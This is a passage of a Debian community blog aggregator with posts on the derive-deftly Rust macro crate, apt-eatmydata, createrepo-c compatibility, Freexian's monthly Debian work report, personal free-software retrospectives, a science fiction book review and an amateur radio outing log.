They involve writing a sort-of-BNF pattern-matcher, and a template which is then expanded with substitutions from the actual input. If your macro wants to accept comma-separated lists, or other simple kinds of input, this is OK. But often we want to emulate a #[derive(...)] macro: e.g., to define code based on a struct, handling each field. Doing that with macro_rules is very awkward:

macro_rules!’s pattern language doesn’t have a cooked way to match a data structure, so you have to hand-write a matcher for Rust syntax, in each macro. Writing such a matcher is very hard in the general case, because macro_rules lacks features for matching important parts of Rust syntax (notably, generics). (If you really need to, there’s a horrible technique as a workaround.)

And, the invocation syntax for the macro is awkward: you must enclose the whole of the struct in my_macro! { }. This makes it hard to apply more than one macro to the same struct, and produces rightward drift.

Enclosing the struct this way means the macro must reproduce its input - so it can have bugs where it mangles the input, perhaps subtly. This also means the reader cannot be sure precisely whether the macro modifies the struct itself. In Rust, the types and data structures are often the key places to go to understand a program, so this is a significant downside.

macro_rules also has various other weird deficiencies too specific to list here.

Overall, compared to (say) the C preprocessor, it’s great, but programmers used to the power of Lisp macros, or (say) metaprogramming in Tcl, will quickly become frustrated.

proc macros

Rust’s second macro system is much more advanced. It is a fully general system for processing and rewriting code. The macro’s implementation is Rust code, which takes the macro’s input as arguments, in the form of Rust tokens, and returns Rust tokens to be inserted into the actual program.

This approach is more similar to Common Lisp’s macros than to most other programming languages’ macros systems. It is extremely powerful, and is used to implement many very widely used and powerful facilities. In particular, proc macros can be applied to data structures with #[derive(...)]. The macro receives the data structure, in the form of Rust tokens, and returns the code for the new implementations, functions etc.

This is used very heavily in the standard library for basic features like #[derive(Debug)] and Clone, and for important libraries like serde and strum.

But, it is a complete pain in the backside to write and maintain a proc_macro.

The Rust types and functions you deal with in your macro are very low level. You must manually handle every possible case, with runtime conditions and pattern-matching. Error handling and recovery is so nontrivial there are macro-writing libraries and even more macros to help. Unlike a Lisp codewalker, a Rust proc macro must deal with Rust’s highly complex syntax. You will probably end up dealing with syn, which is a complete Rust parsing library, separate from the compiler; syn is capable and comprehensive, but a proc macro must still contain a lot of often-intricate code.

There are build/execution environment problems. The proc_macro code can’t live with your application; you have to put the proc macros in a separate cargo package, complicating your build arrangements. The proc macro package environment is weird: you can’t test it separately, without jumping through hoops. Debugging can be awkward. Proper tests can only realistically be done with the help of complex additional tools, and will involve a pinned version of Nightly Rust.

derive-deftly to the rescue

derive-deftly lets you write a #[derive(...)] macro, driven by a data structure, without wading into any of that stuff.

Your macro definition is a template in a simple syntax, with predefined $-substitutions for the various parts of the input data structure.

Example

Here’s a real-world example from a personal project:

define_derive_deftly! {
    export UpdateWorkerReport:
    impl $ttype {
        pub fn update_worker_report(&self, wr: &mut WorkerReport) {
            $(
                ${when fmeta(worker_report)}
                wr.$fname = Some(self.$fname.clone()).into();
            )
        }
    }
}
#[derive(Debug, Deftly, Clone)]
...
#[derive_deftly(UiMap, UpdateWorkerReport)]
pub struct JobRow {
    ...
    #[deftly(worker_report)]
    pub status: JobStatus,
    pub processing: NoneIsEmpty<ProcessingInfo>,
    #[deftly(worker_report)]
    pub info: String,
    pub duplicate_of: Option<JobId>,
}

This is a nice example, also, of how using a macro can avoid bugs. Implementing this update by hand without a macro would involve a lot of cut-and-paste. When doing that cut-and-paste it can be very easy to accidentally write bugs where you forget to update some parts of each of the copies:

    pub fn update_worker_report(&self, wr: &mut WorkerReport) {
        wr.status = Some(self.status.clone()).into();
        wr.info = Some(self.status.clone()).into();
    }

Spot the mistake? We copy status to info. Bugs like this are extremely common, and not always found by the type system. derive-deftly makes it much easier to rule them out entirely.

Special-purpose derive macros are now worthwhile!

Because of the difficult and cumbersome nature of proc macros, very few projects have site-specific, special-purpose #[derive(...)] macros.

The Arti codebase has no bespoke proc macros, across its 240kloc and 86 crates. (We did fork one upstream proc macro package to add a feature we needed.) I have only one bespoke, case-specific, proc macro amongst all of my personal Rust projects; it predates derive-deftly.

Since we have started using derive-deftly in Arti, it has become an important tool in our toolbox. We have 37 bespoke derive macros, done with derive-deftly. Of these, 9 are exported for use by downstream crates. (For comparison there are 176 macro_rules macros.)

In my most recent personal Rust project, I have 22 bespoke derive macros, done with derive-deftly, and 19 macro_rules macros.

derive-deftly macros are easy and straightforward enough that they can be used as readily as macro_rules macros. Indeed, they are often clearer than a macro_rules macro.

Stability without stagnation

derive-deftly is already highly capable, and can solve many advanced problems.

It is mature software, well tested, with excellent documentation, comprising both comprehensive reference material and the walkthrough-structured user guide.

But declaring it 1.0 doesn’t mean that it won’t improve further.

Our ticket tracker has a laundry list of possible features. We’ll sometimes be cautious about committing to these, so we’ve added a beta feature flag, for opting in to less-stable features, so that we can prototype things without painting ourselves into a corner. And, we intend to further develop the Guide.




11 February, 2025 09:16PM

hackergotchi for Bálint Réczey

Bálint Réczey

Supercharge Your Installs with apt-eatmydata: Because Who Needs Crash Safety Anyway? 😈

APT eatmydata super cow powers

Tired of waiting for apt to finish installing packages? Wish there were a way to make your installations blazingly fast without caring about minor things like, oh, data integrity? Well, today is your lucky day! 🎉

I’m thrilled to introduce apt-eatmydata, now available for Debian and all supported Ubuntu releases!

What Is apt-eatmydata?

If you’ve ever used libeatmydata, you know it’s a nifty little hack that disables fsync() and friends, making package installations way faster by skipping unnecessary disk writes. Normally, you’d have to remember to wrap apt commands manually, like this:

eatmydata apt install texlive-full

But who has time for that? apt-eatmydata takes care of this automagically by integrating eatmydata seamlessly into apt itself! That means every package install is now turbocharged—no extra typing required. 🚀

How to Get It

Debian

If you’re on Debian unstable/testing (or possibly soon in stable-backports), you can install it directly with:

sudo apt install apt-eatmydata

Ubuntu

Ubuntu users already enjoy faster package installation thanks to zstd-compressed packages, and to shift into an even higher gear I’ve backported apt-eatmydata to all supported Ubuntu releases. Just add this PPA and install:

sudo add-apt-repository ppa:firebuild/apt-eatmydata
sudo apt install apt-eatmydata

And boom! Your apt install times are getting a serious upgrade. Let’s run some tests…

# pre-download package to measure only the installation
$ sudo apt install -d linux-headers-6.8.0-53-lowlatency
...
# installation time is 9.35s without apt-eatmydata:
$ sudo time apt install linux-headers-6.8.0-53-lowlatency
...
2.30user 2.12system 0:09.35elapsed 47%CPU (0avgtext+0avgdata 174680maxresident)k
32inputs+1495216outputs (0major+196945minor)pagefaults 0swaps
$ sudo apt install apt-eatmydata
...
$ sudo apt purge linux-headers-6.8.0-53-lowlatency
# installation time is 3.17s with apt-eatmydata:
$ sudo time eatmydata apt install linux-headers-6.8.0-53-lowlatency
2.30user 0.88system 0:03.17elapsed 100%CPU (0avgtext+0avgdata 174692maxresident)k
0inputs+205664outputs (0major+198099minor)pagefaults 0swaps

apt-eatmydata just made installing Linux headers 3x faster!

But Wait, There’s More! 🎁

If you’re automating CI builds, there’s even a GitHub Action to make your workflows faster, essentially doing what apt-eatmydata does and setting itself up in less than a second! Check it out here:
👉 GitHub Marketplace: apt-eatmydata

Should You Use It?

🚨 Warning: apt-eatmydata is not for all production environments. If your system crashes mid-install, you might end up with a broken package database. But for throwaway VMs, containers, and CI pipelines? It’s an absolute game-changer. I use it on my laptop, too.

So go forth and install recklessly fast! 🚀

If you run into any issues, feel free to file a bug or drop a comment. Happy hacking!

(To accelerate your CI pipeline or local builds, check out Firebuild, that speeds up the builds, too!)

11 February, 2025 05:04PM by Réczey Bálint

hackergotchi for Kentaro Hayashi

Kentaro Hayashi

Breaking compatibility, upgrade from createrepo-c 0.17.3 to 1.2.0

Recently createrepo-c on Debian unstable was updated from 0.17.3 to 1.2.0. It introduces breaking compatibility about metadata (repodata/*).

In previous versions, the generated metadata was compressed in gz format; the newer version uses zst compression instead. This breaks some yum clients, because old yum clients can't handle the newer metadata format correctly.

At least (as far as I know) it affects Amazon Linux 2, for example.

To keep compatibility with such old platforms, you need to specify the --compatibility option for createrepo-c, as sketched below.
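
A minimal sketch, with the repository path as a placeholder:

createrepo_c --compatibility /srv/repo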

11 February, 2025 10:15AM

hackergotchi for Freexian Collaborators

Freexian Collaborators

Debian Contributions: Python 3.13 as the default Python 3 version, Fixing qtpaths6 for cross compilation, sbuild support for Salsa CI, Rails 7 transition, DebConf preparations and more! (by Anupa Ann Joseph)

Debian Contributions: 2025-01

Contributing to Debian is part of Freexian’s mission. This article covers the latest achievements of Freexian and their collaborators. All of this is made possible by organizations subscribing to our Long Term Support contracts and consulting services.

Python 3.13 is now the default Python 3 version in Debian, by Stefano Rivera and Colin Watson

The Python 3.13 as default transition has now completed. The next step is to remove Python 3.12 from the archive, which should be very straightforward: it just requires rebuilding C extension packages in no particular order. Stefano fixed some miscellaneous bugs blocking the completion of the 3.13 as default transition.

Fixing qtpaths6 for cross compilation, by Helmut Grohne

While Qt5 used qmake to query installation properties, Qt6 is moving more and more to CMake, and to ease that transition it increasingly relies on qtpaths. Since this tool is not naturally aware of the architecture it is called for, it tends to produce results for the build architecture. Therefore, more than 100 packages were picking up a multiarch directory for the build architecture during cross builds. In collaboration with the Qt/KDE team and Sandro Knauß in particular (none affiliated with Freexian), we added an architecture-specific wrapper script in the same way qmake has one for Qt5 and Qt6 already. The relevant CMake module has been updated to prefer the triplet-prefixed wrapper. As a result, most of the KDE packages now cross build on unstable, ready in time for the trixie release.

/usr-move, by Helmut Grohne

In December, Emil Södergren reported that a live-build was not working for him, and in January, Colin Watson reported that the proposed mitigation for debian-installer-utils would practically fail. Both failures were attributable to a wrong understanding of implementation-defined behavior in dpkg-divert. As a result, all M18 mitigations had to be reviewed and many of them replaced. Many have been uploaded already, and all instances have received updated patches.

Even though dumat has been in operation for more than a year, it gained recent changes. For one thing, analysis of architectures other than amd64 was requested. Chris Hofstaedtler (not affiliated with Freexian) kindly provided computing resources for repeatedly running it on the larger set. Doing so revealed various cross-architecture undeclared file conflicts in gcc, glibc, and binutils-z80, but it also revealed a previously unknown /usr-move issue in rpi.rpi-common. On top of that, dumat produced false positive diagnostics and wrongly associated Debian bugs in some cases, both of which have now been fixed. As a result, a supposedly fixed python3-sepolicy issue had to be reopened.

rebootstrap, by Helmut Grohne

As much as we think of our base system as stable, it is changing a lot and the architecture cross bootstrap tooling is very sensitive to such changes requiring permanent maintenance. A problem that recently surfaced was that building a binutils cross toolchain would result in a binutils-for-host package that would not be practically installable as it would depend on a binutils-common package that was not built. This turned into an examination of binutils-common and noticing that it actually differed across architectures even though it should not. Johannes Schauer Marin Rodrigues (not affiliated with Freexian) and Colin Watson kindly helped brainstorm possible solutions. Eventually, Helmut provided a patch to move gprofng bits out of binutils-common. Independently, Matthias Klose (not affiliated with Freexian) split out binutils-gold into a separate source package. As a result, binutils-common is now equal across architectures and can be marked Multi-Arch: foreign resolving the initial problem.

Salsa CI, by Santiago Ruano Rincón

Santiago continued the work on sbuild support for Salsa CI that was mentioned in the previous monthly report. The !568 merge request that created the new build image was merged, making it easier to test !569 with external projects. Santiago used a fork of the debusine repo to try the draft !569; some issues were spotted, part of them already fixed. This is the last debusine pipeline run with the current !569: https://salsa.debian.org/santiago/debusine/-/pipelines/794233. One of the last improvements relates to how to enable projects to customize the pipeline, in a way equivalent to what they currently do in the extract-source and build jobs. While this is work in progress, the results are rather promising. Next steps include deciding on introducing schroot support for bookworm, bookworm-security, and older releases, as is done on the official Debian buildds.

DebConf preparations, by Stefano Rivera and Santiago Ruano Rincón

DebConf will be happening in Brest, France, in July. Santiago continued the DebConf 25 organization work, looking for catering providers.

Both Stefano and Santiago have been reaching out to some potential sponsors. DebConf depends on sponsors to cover the organization cost; if your company depends on Debian, please consider sponsoring DebConf.

Stefano has been winding up some of the finances from previous DebConfs. Finalizing reimbursements to team members from DebConf 23, and handling some outstanding issues from DebConf 24. Stefano and the rest of the DebConf committee have been reviewing bids for DebConf 26, to select the next venue.

Ruby 3.3 is now the default Ruby interpreter, by Lucas Kanashiro

Ruby 3.3 is about to become the default Ruby interpreter for Trixie. Many bugs were fixed by Lucas and the Debian Ruby team during the sprint held in Paris during Jan 27-31. The next step is to remove support for Ruby 3.1, which is the alternative Ruby interpreter for now. Thanks to the Debian Release team for all the support, especially Emilio Pozuelo Monfort.

Rails 7 transition, by Lucas Kanashiro

Rails 6 has been shipped by Debian since Bullseye, and as a web framework it has accumulated many issues (especially security-related ones), making it harder and harder to maintain. With that in mind, during the Debian Ruby team sprint last month, the transition to Rack 3 (an important dependency of Rails containing many breaking changes) was started in Debian unstable and is ongoing. Once it is done, the Rails 7 transition will take place, and Rails 7 should be shipped in Debian Trixie.

Miscellaneous contributions

  • Stefano improved a poor ImportError for users of the turtle module on Python 3, who haven’t installed the python3-tk package.
  • Stefano updated several packages to new upstream releases.
  • Stefano added the Python extension to the re2 package, allowing for the use of the Google RE2 regular expression library as a direct replacement for the standard library re module.
  • Stefano started provisioning a new physical server for the debian.social infrastructure.
  • Carles improved simplemonitor (documentation on systemd integration, worked with upstream for fixing a bug).
  • Carles upgraded packages to new upstream versions: python-ring-doorbell and python-asyncclick.
  • Carles did po-debconf translations to Catalan: reviewed 44 packages and submitted translations to 90 packages (via salsa merge requests or bugtracker bugs).
  • Carles maintained po-debconf-manager with small fixes.
  • Raphaël worked on some outstanding DEP-14 merge requests and participated in the associated discussion. The discussions have been more contentious than anticipated, somewhat exacerbated by Otto’s desire to conclude fast while the required tool support is not yet there.
  • Raphaël, with the help of Philipp Kern from the DSA team, upgraded tracker.debian.org to use Django 4.2 (from bookworm-backports) which in turn enabled him to configure authentication via salsa.debian.org. It’s now possible to login to tracker.debian.org with your salsa credentials!
  • Raphaël updated zim — a nice desktop wiki that is very handy to organize your day-to-day digital life — to the latest upstream version (0.76).
  • Helmut sent patches for 10 cross build failures.
  • Helmut continued working on a tool for memory-based concurrency limit of builds.
  • Helmut NMUed libtool, opensysusers and virtualbox.
  • Enrico tried to support Helmut in working out tricky usrmerge situations.
  • Thorsten Alteholz uploaded a new upstream version of brlaser.
  • Colin Watson upgraded 33 Python packages to new upstream versions, including fixes for CVE-2024-42353, CVE-2024-47532, and CVE-2025-22153.
  • Emilio Pozuelo managed various transitions, and fixed various RC bugs (telepathy-glib, xorg, xserver-xorg-video-vesa, apitrace, mesa).
  • Anupa attended the monthly team meeting for Debian publicity team and shared the social media stats.
  • Anupa assisted Jean-Pierre Giraud in the point release announcement for Debian 12.9 and published the Micronews.
  • Anupa took part in multiple Debian publicity team discussions regarding our presence in social media platforms.

11 February, 2025 12:00AM by Anupa Ann Joseph

February 10, 2025

Petter Reinholdtsen

Some of my 2024 free software activities

It is a while since I posted a summary of the free software and open culture activities and projects I have worked on. Here is a quick summary of the major ones from last year.

I guess the biggest project of the year has been migrating orphaned packages in Debian without a version control system to have a git repository on salsa.debian.org. When I started in April, around 450 of the orphaned packages needed git. I've since migrated around 250 of the packages to a salsa git repository, and around 40 packages were left when I took a break. I'm not sure who did the roughly 160 conversions I was not involved in, but I am very glad I got some help on the project. I stopped partly because some of the remaining packages needed more disk space to build than I have available on my development machine, and partly because some had a strange build setup I could not figure out. I had a time budget of 20 minutes per package; if a package proved problematic and likely to take longer, I moved on to another package. I might continue later, if I manage to free up some disk space.

Another rather big project was the translation to Norwegian Bokmål and publishing of the first book ever published by a Sámi woman, the «Møter vi liv eller død?» book by Elsa Laula, with a PD0 and CC-BY license. I released it during the summer, and to my surprise it has already sold several copies. As I suck at marketing, I did not expect to sell any.

A smaller, but more long-term project (running for more than 10 years now), and related to orphaned packages in Debian, is my project to ensure a simple way to install hardware-related packages in Debian when the relevant hardware is present in a machine. It made a fairly big advance forward last year, partly because I have been poking and begging package maintainers and upstream developers to include AppStream metadata XML in their packages. I've also released a few new versions of the isenkram system with some robustness improvements. Today 127 packages in Debian provide such information, allowing isenkram-lookup to propose them. I will keep pushing until the around 35 package names currently hard-coded in the isenkram package are down to zero, so that only information provided by individual packages is used for this feature.
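To give an idea of how the matching works, the AppStream metadata pool can be queried for a hardware identifier directly (a sketch; the modalias pattern below is a made-up example), while isenkram-lookup does the same matching against the hardware actually present in the machine:

# ask AppStream which packages declare support for a given modalias
appstreamcli what-provides modalias 'usb:v046DpC52Bd*'
# or let isenkram propose packages matching the local hardware
isenkram-lookup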

As part of the work on AppStream, I have sponsored several packages into Debian where the maintainer wanted to fix the issue but lacked direct upload rights. I've also sponsored a few other packages, when approached by the maintainer.

I would also like to mention two hardware-related packages in particular where I have been involved, the megactl and mfi-util packages. Both work with the hardware RAID systems in several Dell PowerEdge servers. The first one is already available in Debian (and of course proposed by isenkram when used on the appropriate Dell server); the other has been waiting for NEW processing since this autumn. I manage several such Dell servers and would like the tools needed to monitor and configure these RAID controllers to be available from within Debian out of the box.

Vaguely related to hardware support in Debian, I have also been trying to find ways to help out the Debian ROCm team, to improve the support in Debian for my artificial idiocy (AI) compute node. So far I have only uploaded one package, helped test the initial packaging of llama.cpp and tried to figure out how to get good speech recognition, like Whisper, into Debian.

I am still involved in the LinuxCNC project, and organised a developer gathering in Norway last summer. A new one is planned for the summer of 2025. I've also helped evaluate patches and uploaded new versions of LinuxCNC into Debian.

After a 10-year-long break, we managed to get a new and improved upstream version of lsdvd released just before Christmas. As I use it regularly to maintain my DVD archive, I was very happy to finally get out a version supporting DVDDiscID, useful for uniquely identifying DVDs. I am dreaming of an Internet service mapping DVD IDs to IMDB movie IDs, to make life as a DVD collector easier.

My involvement in Norwegian archive standardisation and the free software implementation of the vendor-neutral Noark 5 API continued for the entire year. I've been pushing patches into both the API and the test code for the API, participated in several editorial meetings regarding the Noark 5 Tjenestegrensesnitt specification, and submitted several proposals to improve it. We also organised a small seminar for people interested in Noark 5, and are organising a new seminar in a month.

Part of the year was spent working on and coordinating a Norwegian Bokmål translation of the marvellous children's book «Ada and Zangemann», which focuses on the right to repair and control your own property, and the value of controlling the software on the devices you own. The translation is mostly complete, and is now waiting for a transformation of the project and manuscript to use DocBook XML instead of a home-made semi-text-based format. Great progress is being made and the new book build process is almost complete.

I have also been looking at how companies in Norway can use free software to report their accounting summaries to the Norwegian government. Several new regulations make it very hard for companies to use free software for accounting, and I would like to change this. I have found a few drafts for opening up the reporting process, and have read up on some of the specifications, but nothing much is working yet.

These were just the tip of the iceberg, but I guess this blog post is long enough now. If you would like to help with any of these projects, please get in touch, either directly on the project mailing lists and forums, or with me via email, IRC or Signal. :)

As usual, if you use Bitcoin and want to show your support of my activities, please send Bitcoin donations to my address 15oWEoG9dUPovwmUL9KWAnYRtNJEkP1u1b.

10 February, 2025 08:30AM

Russ Allbery

Review: The Scavenger Door

Review: The Scavenger Door, by Suzanne Palmer

Series: Finder Chronicles #3
Publisher: DAW
Copyright: 2021
ISBN: 0-7564-1516-0
Format: Kindle
Pages: 458

The Scavenger Door is a science fiction adventure and the third book of the Finder Chronicles. While each of the books of this series stands alone reasonably well, I would still read the series in order. Each book has some spoilers for the previous book.

Fergus is back on Earth following the events of Driving the Deep, at loose ends and annoying his relatives. To get him out of their hair, his cousin sends him into the Scottish hills to find a friend's missing flock of sheep. Fergus finds things professionally, but usually not livestock. It's an easy enough job, though; the lead sheep was wearing a tracker and he just has to get close enough to pick it up. The unexpected twist is also finding a metal fragment buried in a hillside that has some strange resonance with the unwanted gift that Fergus got in Finder.

Fergus's alien friend Ignatio is so alarmed by the metal fragment that he turns up in person in Fergus's cousin's bar in Scotland. Before he arrives, Fergus gets a mysteriously infuriating warning visit from alien acquaintances he does not consider friends. He has, as usual, stepped into something dangerous and complicated, and now somehow it's become his problem.

So, first, we get lots of Ignatio, who is an enthusiastic large ball of green fuzz with five limbs who mostly speaks English but does so from an odd angle. This makes me happy because I love Ignatio and his tendency to take things just a bit too literally.

SANTO'S, the sign read. Under it, in smaller letters, was CURIOSITIES AND INCONVENIENCES FOR COMMENDABLE SUMS.

"Inconveniences sound just like my thing," Fergus said. "You two want to wait in the car while I check it out?"

"Oh, no, I am not missing this," Isla said, and got out of the podcar.

"I am uncertain," Ignatio said. "I would like some curiouses, but not any inconveniences. Please proceed while I decide, and if there is also murdering or calamity or raisins, you will yell right away, yes?"

Also, if your story setup requires a partly-understood alien artifact that the protagonist can get some explanations for but not have the mystery neatly solved for them, Ignatio's explanations are perfect.

"It is a door. A doorbell. A... peephole? A key. A control light. A signal. A stop-and-go sign. A road. A bridge. A beacon. A call. A map. A channel. A way," Ignatio said. "It is a problem to explain. To say a doorkey is best, and also wrong. If put together, a path may be opened."

"And then?"

"And then the bad things on the other side, who we were trying to lock away, will be free to travel through."

Second, the thing about Palmer's writing that continues to impress me is her ability to take a standard science fiction plot, one whose variations I've read probably dozens of times before, and still make it utterly engrossing. This book is literally a fetch quest. There are a bunch of scattered fragments, Fergus has to find them and keep them from being assembled, various other people are after the same fragments, and Fergus either has to get there first or get the fragments back from them. If you haven't read this book before, you've played the video game or watched the movie. The threat is basically a Stargate SG-1 plot. And yet, this was so much fun.

The characters are great. This book leans less on found family than the last one and a bit more on actual family. When I started reading this series, Fergus felt a bit bland in the way that adventure protagonists sometimes can, but he's fleshed out nicely as the series goes along. He's not someone who tends to indulge in big emotions, but now the reader can tell that's because he's the kind of person who finds things to do in order to keep from dwelling on things he doesn't want to think about. He's unflappable in a quietly competent way while still having a backstory and emotional baggage and a rich inner life that the reader sees in glancing fragments.

We get more of Fergus's backstory, particularly around Mars, but I like that it's told in anecdotes and small pieces. The last thing Fergus wants to do is wallow in his past trauma, so he doesn't and finds something to do instead. There's just enough detail around the edges to deepen his character without turning the book into a story about Fergus's emotions and childhood. It's a tricky balancing act that Palmer handles well.

There are also more sentient ships, and I am so in favor of more sentient ships.

"When I am adding a new skill, I import diagnostic and environmental information specific to my platform and topology, segregate the skill subroutines to a dedicated, protected logical space, run incremental testing on integration under all projected scenarios and variables, and then when I am persuaded the code is benevolent, an asset, and provides the functionality I was seeking, I roll it into my primary processing units," Whiro said. "You cannot do any of that, because if I may speak in purely objective terms you may incorrectly interpret as personal, you are made of squishy, unreliable goo."

We get the normal pieces of a well-done fetch quest: wildly varying locations, some great local characters (the US-based trauma surgeons on vacation in Australia were my favorites), and believable antagonists. There are two other groups looking for the fragments, and while one of them is the standard villain in this sort of story, the other is an apocalyptic cult whose members Fergus mostly feels sorry for and who add just the right amount of surreality to the story. The more we find out about them, the more believable they are, and the more they make this world feel like realistic messy chaos instead of the obvious (and boring) good versus evil patterns that a lot of adventure plots collapse into.

There are things about this book that I feel like I should be criticizing, but I just can't. Fetch quests are usually synonymous with lazy plotting, and yet it worked for me. The way Fergus gets dumped into the middle of this problem starts out feeling as arbitrary and unmotivated as some video game fetch quest stories, but by the end of the book it starts to make sense. The story could arguably be described as episodic and cliched, and yet I was thoroughly invested. There are a few pacing problems at the very end, but I was too invested to care that much. This feels like a book that's better than the sum of its parts.

Most of the story is future-Earth adventure with some heist elements. The ending goes in a rather different direction but stays at the center of the classic science fiction genre. The Scavenger Door reaches a satisfying conclusion, but there are a ton of unanswered questions that will send me on to the fourth (and reportedly final) novel in the series shortly.

This is great stuff. It's not going to win literary awards, but if you're in the mood for some classic science fiction with fun aliens and neat ideas, but also benefiting from the massive improvements in characterization the genre has seen in the past forty years, this series is perfect. Highly recommended.

Followed by Ghostdrift.

Rating: 9 out of 10

10 February, 2025 04:03AM

February 09, 2025

hackergotchi for Philipp Kern

Philipp Kern

20 years

20 years ago, I got my Debian Developer account. I was 18 at the time, it was Shrove Tuesday and - as is customary - I was drunk when I got the email. There was so much that I did not know - which is also why the process took 1.5 years from the time I applied. I mostly only maintained a package or two. I'm still amazed that Christian Perrier and Joerg Jaspert put sufficient trust in me at that time. Nevertheless now feels like a good time for a personal reflection of my involvement in Debian.

During my studies I took on more things. In January 2008 I joined the Release Team as an assistant, which taught me a lot about code review. I have also been an Application Manager on the side.

Going to my first Debconf was really a turning point. My first one was Mar del Plata in Argentina in August 2008, when I was 21. That was quite an excitement, traveling that far from Germany for the first time. The personal connections I made there made quite the difference. It was also a big boost for motivation. I attended 8 (Argentina), 9 (Spain), 10 (New York), 11 (Bosnia and Herzegovina), 12 (Nicaragua), 13 (Switzerland), 14 (Portland), 15 (Germany), 16 (South Africa), and hopefully I'll make it to this year's in Brest. At all of them I did not see much of the host countries, as I prioritized spending my time on Debian, even skipping some of the day trips in favor of team meetings. Yet I am very grateful to the project (and to my employer) for shipping me there.

I ended up as Stable Release Manager for a while, from August 2008 - when Martin Zobel-Helas moved into DSA - until I got dropped in March 2020. I think my biggest achievements were pushing for the creation of -updates to replace the separate volatile archive, and a change of the update policy to allow for more common-sense updates in the main archive vs. the very strict "breakage or security" policy we had previously. I definitely need to call out Adam D. Barratt for being the partner in crime, holding up the fort for even longer.

In 2009 I got too annoyed at the existing wanna-build team not being responsive anymore and pushed for the system to be given to a new team. I did not build it; significant contributions were made by other people (like Andreas Barth and Joachim Breitner, and later Aurelien Jarno). I mostly reworked the way the system was triggered, investigated when it broke, and was around when people wanted things merged.

In the meantime I worked sys/netadmin jobs while at university, both paid and as a volunteer with the students' council. For a year or two I was the administrator of a System z mainframe IBM donated to my university. We had a mainframe course and I attended two related conferences. That's where my s390(x) interest came from, although credit for the port needs to go to Aurelien Jarno.

Since completing university in 2013 I have been working for a company for almost 12 years. Debian experience was very relevant to the job and I went on maintaining a Linux distro or two at work - before venturing off into security hardening. People in megacorps - in my humble opinion - disappear from the volunteer projects because a) they might previously have been studying and thus had a lot more time on their hands and b) the job is too similar to the volunteer work and thus the same brain cells used for work are exhausted and can't be easily reused for volunteer work. I kept maintaining a couple of things (buildds, some packages) - mostly because of a sense of commitment and responsibility, but otherwise kind of scaled down my involvement. I also felt less connected as I dropped off IRC.

Last year I finally made it to Debian events again: MiniDebconf in Berlin, where we discussed the aftermath of the xz incident, and the Debian BSP in Salzburg. I rejoined IRC using the Matrix bridge. That also rekindled my involvement, with me guiding a new DD through NM and ending up in DSA. To be honest, only in the last two or three years have I felt like a (more) mature old-timer.

I have a new gig at work lined up to start soon, and alongside that I have sysadmining for Debian. It is pretty motivating to me that I can just get things done - something that is much harder to achieve at work due to organizational complexities. It balances out some frustration I'd otherwise have. The work is different enough to be enjoyable and the people I work with are great.

The future

I still think the work we do in Debian is important, as much as I see a lack of appreciation in a world full of containers. We are reaping most of the benefits of standing on the shoulders of giants and of great decisions made in the past (e.g. the excellent Debian policy, but also the organizational model) that made Debian what it is today.

Given the increase in size and complexity of what Debian ships - and the somewhat dwindling resource of developer time - it would benefit us to have better processes for large-scale changes across all packages. I greatly respect the horizontal efforts that are currently being driven and that suck up a lot of energy.

A lot of our infrastructure is also aging and not super well maintained. Many take it for granted that the services we have keep existing, but most are only maintained by a person or two, if even. Software stacks are aging and it is even a struggle to have all necessary packages in the next release.

Hopefully I can contribute a bit or two to these efforts in the future.

09 February, 2025 11:43PM by Philipp Kern (noreply@blogger.com)

Dave Hibberd

Radio Activity 10-16 Feb 2025

It’s been quite the week of radio related nonsense for me, where I’ve been channelling my time and brainspace for radio into activity on air and system refinements, not working on Debian.

POTA, Antennas and why do my toys not work?

Having had my interest piqued by Ian at mastodon.radio, I looked online and spotted a couple of parks within stumbling distance of my house, that’s good news! It looks like the list has been refactored and expanded since I last looked at it, so there are now more entities to activate and explore.

My concerns about antennas noted last week rumbled on. There was a second strand to this concern too, my end fed 64:1 (or 49:1?!) transformer from MM0OPX sits in my mind as not having worked very well in Spain last year, and I want to get to the bottom of why. As with most things in my life, it’s probably a me problem.

I came up with a cunning plan - firstly, buy a new mast to replace the one I broke a few weeks back on Cat Law.

Secondly, buy a couple of new connectors and some heatshrink to reterminate my cable that I’m sure is broken.

Spending more money on a problem never hurt anyone, right?

Come Wednesday, the new toys arrived and I figured combining everything into one convenient night time walk and radio was a good plan.

So I walk out to the nearest park with my LoRa APRS doofer going and see what happens:

APRS-Map

After circling a bit to find somewhere suitable (there appear to be construction works in the park!) I set up my gear in 2°C with frost on the ground, called CQ, self-spotted, and got nothing on either the end fed half wave or the cheap vertical.

As it was too late for 20m, I tried 40 and a bit of 80 using the inbuilt tuner, but wasn’t heard by stations I called or when calling independently.

I packed everything up and lora-doofered my way home, mildly deflated.

Try it at home

It still didn’t sit with me that the end fed wasn’t working, so come Friday night I set it up in the back garden/woods behind the house to try and diagnose why it wasn’t working.

Up it went, I worked some Irish stations pretty effortlessly, and down everything came. No complaints - the only things I did differently were having the feedpoint a little higher and checking my power, limiting it to 10W. The G90 can do 20W; I wonder if running at that was saturating the core in the 64:1.

At some point in the evening I stepped in some dog’s shit too, and spent some time cleaning my boots outside to avoid further tramping the smell through the house.

Win some, lose some.

Take it to the Hills

On Friday, some of the other GM-ES Sota-ists had been out for an activity day.

On account of me being busy in work, I couldn’t go outside to play, but I figured a weekend of activity was on the books.

Saturday - A day above the clouds

On Saturday I took myself up Tap O’ Noth, a favourite of mine for some reason, and Lord Arthur’s Hill.

Before I hit the hills, I took myself to the hackerspace and printed myself a K6ARK Winder and a guy ring for the mast, cut string, tied it together and wound the string on to the winder.

I also took time to buzz out my wonky coax and it showed great continuity. Hmm, that can be continued later. I didn’t quite get to crimping the radial network of the Aliexpress whip with a 12mm stud crimp, that can also be put on the TODO list.

Tap O’ Noth

Once finally out, the weather was a bit cloudy with passing snow showers, but in between the showers I was above the clouds and the air was clear:

After a mild struggle on 2m, I set up the end fed on the first hill and got to work from the old hill fort:

The end fed worked flawlessly. Exactly as promised, switching between 7MHz, 14MHz, 21MHz and 28MHz without a tuner was perfect, I chased hills on all the bands, and had a great time. Apart from 40m, where there was absolutely no space due to a contest. That wasn’t such a fun time!

My fingers were bitterly cold, so on went the big gloves for the descent and I felt like I was warm by the time I made it back to the car.

It worked so well, in fact, I took the 1/4 wave cheap vertical out my bag and decided to brave it on the next activation.

Lord Arthur’s Hill

GM5ALX has posted a .gpx to sotlas which is shorter than the other ascent, but much sharper - I figured this would be a fun new way to try up the hill!

It takes you right through the heart of the Littlewood Park estate, and I felt a bit uncomfortable walking straight past the estate cottages, especially when there were vehicles moving and active work happening. Presumably this is where Lord Arthur lived, at the foot of his hill.

